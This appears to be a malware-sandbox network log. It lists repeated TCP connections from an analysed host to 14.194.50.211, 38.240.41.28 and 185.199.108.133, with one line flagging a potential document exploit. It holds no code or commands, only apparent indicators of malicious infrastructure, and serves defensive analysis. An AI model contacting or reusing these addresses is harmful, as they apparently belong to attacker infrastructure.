Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 14.194.50.211:443
Source: global traffic TCP traffic: 14.194.50.211:443 -> 192.168.2.22:49168
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49169
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
